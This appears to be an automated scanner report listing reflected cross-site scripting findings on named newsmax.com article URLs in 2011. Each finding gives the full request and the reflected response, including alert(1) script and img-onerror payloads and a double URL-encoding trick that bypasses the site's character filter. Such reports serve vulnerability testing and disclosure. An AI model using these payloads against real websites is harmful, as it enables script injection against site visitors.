The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdc78'%20a%3db%2071ab5e4ca06 was submitted in the REST URL parameter 5. This input was echoed as cdc78' a=b 71ab5e4ca06 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17cdc78'%20a%3db%2071ab5e4ca06/id/389851 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45883 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17cdc78' a=b 71ab5e4ca06/id/389851' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89858'%20a%3db%20f00bb1a6af5 was submitted in the REST URL parameter 7. This input was echoed as 89858' a=b f00bb1a6af5 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/38985189858'%20a%3db%20f00bb1a6af5 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41622 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/38985189858' a=b f00bb1a6af5' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c524%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebda1408e22f was submitted in the REST URL parameter 7. This input was echoed as 4c524"><img src=a onerror=alert(1)>bda1408e22f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/3898514c524%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebda1408e22f HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42066 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(3898514c524"><img src=a onerror=alert(1)>bda1408e22f);" class="article_tools_link"> ...[SNIP]...
1.63. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49787'><script>alert(1)</script>a43f963cc7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?49787'><script>alert(1)</script>a43f963cc7a=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46105 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?49787'><script>alert(1)</script>a43f963cc7a=1' class="article_tools_link"> ...[SNIP]...
1.64. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3dfa"><script>alert(1)</script>8b1dee82801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?a3dfa"><script>alert(1)</script>8b1dee82801=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46110 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?a3dfa"><script>alert(1)</script>8b1dee82801=1')" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66ef7'%20a%3db%20756d7b3c9ed was submitted in the REST URL parameter 2. This input was echoed as 66ef7' a=b 756d7b3c9ed in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake66ef7'%20a%3db%20756d7b3c9ed/2011/03/18/id/389964 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63663 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake66ef7' a=b 756d7b3c9ed/2011/03/18/id/389964' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61b74'%20a%3db%20e5a37a9c0f7 was submitted in the REST URL parameter 3. This input was echoed as 61b74' a=b e5a37a9c0f7 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/201161b74'%20a%3db%20e5a37a9c0f7/03/18/id/389964 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63663 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/201161b74' a=b e5a37a9c0f7/03/18/id/389964' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8adcf'%20a%3db%2002ec750a1ab was submitted in the REST URL parameter 4. This input was echoed as 8adcf' a=b 02ec750a1ab in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/038adcf'%20a%3db%2002ec750a1ab/18/id/389964 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63663 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/038adcf' a=b 02ec750a1ab/18/id/389964' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67dd1'%20a%3db%2043052552722 was submitted in the REST URL parameter 5. This input was echoed as 67dd1' a=b 43052552722 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/1867dd1'%20a%3db%2043052552722/id/389964 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63663 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/1867dd1' a=b 43052552722/id/389964' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8dbe1'%20a%3db%20db65a001b85 was submitted in the REST URL parameter 7. This input was echoed as 8dbe1' a=b db65a001b85 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/3899648dbe1'%20a%3db%20db65a001b85 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41105 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/3899648dbe1' a=b db65a001b85' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf295%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0416374c63c was submitted in the REST URL parameter 7. This input was echoed as cf295"><img src=a onerror=alert(1)>0416374c63c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964cf295%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0416374c63c HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41553 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(389964cf295"><img src=a onerror=alert(1)>0416374c63c);" class="article_tools_link"> ...[SNIP]...
1.71. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab48a"><script>alert(1)</script>634d853d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?ab48a"><script>alert(1)</script>634d853d2e=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63881 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?ab48a"><script>alert(1)</script>634d853d2e=1')" class="article_tools_link"> ...[SNIP]...
1.72. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3e8c7'><script>alert(1)</script>75f499a6f0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?3e8c7'><script>alert(1)</script>75f499a6f0c=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63885 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?3e8c7'><script>alert(1)</script>75f499a6f0c=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab5a7'%20a%3db%20d6193e50b41 was submitted in the REST URL parameter 2. This input was echoed as ab5a7' a=b d6193e50b41 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturdayab5a7'%20a%3db%20d6193e50b41/2011/03/18/id/389920 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43644 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturdayab5a7' a=b d6193e50b41/2011/03/18/id/389920' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db41b'%20a%3db%2017ed13ad59c was submitted in the REST URL parameter 3. This input was echoed as db41b' a=b 17ed13ad59c in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011db41b'%20a%3db%2017ed13ad59c/03/18/id/389920 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43644 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:27 GMT Connection: close
